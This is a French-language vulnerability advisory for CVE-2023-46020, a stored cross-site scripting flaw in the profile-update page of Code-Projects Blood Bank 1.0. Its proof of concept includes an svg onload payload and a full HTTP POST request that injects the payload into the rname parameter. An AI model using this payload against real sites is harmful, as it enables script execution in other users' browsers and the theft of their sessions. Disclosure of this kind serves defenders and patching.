CVE-2023-46020-Code-Projects-Blood-Bank-1.0-Vulnérabilité de Cross-Site Scripting stocké
- Auteur de l'exploit : ersinerenler
Page d'accueil du fournisseur
Lien du logiciel
Aperçu
- Code-Projects Blood Bank V1.0 est sensible à une vulnérabilité de sécurité critique impliquant du Cross-Site Scripting stocké (XSS) via plusieurs paramètres (rename, remail, rphone et rcity) dans le fichier /updateprofile.php. L'application ne parvient pas à assainir correctement les données fournies par l'utilisateur, permettant aux attaquants d'injecter des scripts malveillants dans l'application. Cela pourrait entraîner l'exécution de code de script arbitraire dans les navigateurs d'utilisateurs sans méfiance, compromettant potentiellement leur sécurité et leur vie privée dans le contexte du site affecté.
Détails de la vulnérabilité
- CVE ID: CVE-2023-46020
- Version affectée : Blood Bank V1.0
- Fichier vulnérable : updateprofile.php
- Paramètres : rename, remail, rphone, rcity
- Type d'attaque : local
Références :
Description
- Les paramètres rename, remail, rphone et rcity dans le fichier /file/updateprofile.php de Code-Projects Blood Bank V1.0 sont sensibles au Cross-Site Scripting stocké (XSS). Cette vulnérabilité survient en raison d'une validation et d'un assainissement insuffisants des données fournies par l'utilisateur. Un attaquant peut exploiter cette faiblesse en injectant des scripts malveillants dans ces paramètres, qui, une fois stockés sur le serveur, peuvent être exécutés lorsque d'autres utilisateurs consultent le profil de l'utilisateur affecté.
Preuve de concept (PoC) :
- Interceptez la requête POST vers updateprofile.php via Burp Suite
- Injectez la charge utile dans les paramètres vulnérables
- Charge utile :
"><svg/onload=alert(document.domain)>
- Exemple de requête pour le paramètre
rname
POST /bloodbank/file/updateprofile.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 103
Origin: http://localhost
Connection: close
Referer: http://localhost/bloodbank/rprofile.php?id=1
Cookie: PHPSESSID=<some-cookie-value>
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
rname=test"><svg/onload=alert(document.domain)>&remail=test%40gmail.com&rpassword=test&rphone=8875643456&rcity=lucknow&bg=A%2B&update=Update
- Accédez à la page de profil et déclenchez le XSS
